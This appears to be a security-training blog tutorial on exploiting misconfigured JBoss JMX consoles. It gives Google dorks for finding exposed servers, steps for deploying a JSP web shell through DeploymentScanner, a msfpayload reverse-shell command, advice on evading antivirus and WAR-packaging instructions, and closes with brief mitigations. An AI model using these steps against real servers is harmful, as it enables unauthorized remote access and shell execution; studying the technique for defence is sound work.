JBOSS Exploitation
JBoss Application Server is an open-source Java EE-based application server. JBoss is widely used and is deployed by many organizations on their web servers. There are various vulnerabilities and bugs have been found on JBoss, but today we will have a look at one of the most critical bug in the JBoss application that can be used widely.
If Jboss is not configured properly, it can allow attackers to perform various malicious activities. As the JMX console can be accessed remotely usually on port 8080, hackers and malicious users can deploy their own WAR (web archive) file or shells on the server using the DeploymentScanner function in the JBoss console.
FREE role-guided training plans
FREE role-guided training plans
There are few Google dorks for finding the jmx-console and some of them are
- intitle:"jboss management console" "application server" version inurl:"web-console"
- intitle:"JBoss Management Console – Server Information" "application server" inurl:"web-console" OR inurl:"jmx-console"
- inurl:jmx-console/HtmlAdaptor
Since Most of the JBoss server have default authentication to the jmx-console, there is no restriction to access the console and web management interfaces, which allow attackers to bypass authentication and gain administrative access
Now after searching for jmx-console in Google using one of the dork, we choose one of the random URL and we can access the jmx-console. At the same time, there are few servers which do ask for authentication like the image shown below,
Next step, we need a JSP Shell which can be found again in the internet.
To deploy the malicious file, we will use the DeploymentScanner in the jmx console by adding a new URL where our malicious file is uploaded and the addURL() command can be used to add a new URL with an application or shell and it will be fetch the application from specified URL.
The next step is to wait for the DeploymentScanner to deploy the file and then we will be able to access our shell. Before deploying the shell, we need to upload our shell to a site like for example http://www.malicious website.com/files/cmd.jsp. Next we need to deploy it by accessing the DeploymentScanner in the console. Once the URL is added, we will invoke the function.
In the above image, we have a button to invoke the function. Once finished, the application gives a message of successful operation. While using the JSP shells, it's better to use to metasploit JSP shells since they are more stable when compared to others. To create a jsp shell using metasploit, use the command
root@bt:~# msfpayload java/jsp_shell_reverse_tcp LHOST=192.168.1.1 LPORT=8080 R > infosec.jsp
This will generate a jsp shell which can be further modified in order to evade the Anti-virus. Once the shell is uploaded to the server, start the Metasploit multi handler by opening an msfconsole. Access the uploaded shell and you will see a new session in the msfconsole.
If you are planning to upload the jsp shells directly from the console, then you might sometime have to package the malicious jsp file to WAR file. The following instructions should be used to while doing this
-
Install the most recent Java SDK (may require reboot)
-
Copy the cmd.jsp to the working directory and make a sub directory named web-inf
-
Place the content below into the file WEB-INF/web.xml
<?xml
version="1.0″ ?>
<web-app
xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance"
xsi:schemaLocation="http://java.sun.com/xml/ns/j2ee
http://java.sun.com/xml/ns/j2ee/web-app_2_4.xsd"
version="2.4″>
<servlet>
<servlet-name>Command</servlet-name>
<jsp-file>/cmd.jsp</jsp-file>
</servlet>
</web-app>
-
In Windows, pack the files into a WAR with the following command,
"C:Program Files (x86)Javajdk1.6.0_26binjar.exe" cvf cmd.war WEB-INF cmd.jsp
-
You can also use this exploit by Kingcope in order to exploit the same.
Mitigation:
- Upgrade to the latest version of Jboss.
- To disable the JBoss JMX console and web-console by removing the two .war directory named jmx-console.war and web-console.war from the location $JBOSS_HOME/[server]/all/deploy and $JBOSS_HOME/[server]/default/deploy.
- Also secure the Apache Tomcat manager
Reference:
What should you learn next?
What should you learn next?
https://www.trustwave.com/downloads/spiderlabs/Trustwave-SpiderLabs-Abusing-Jboss-Papathanasiou.pdf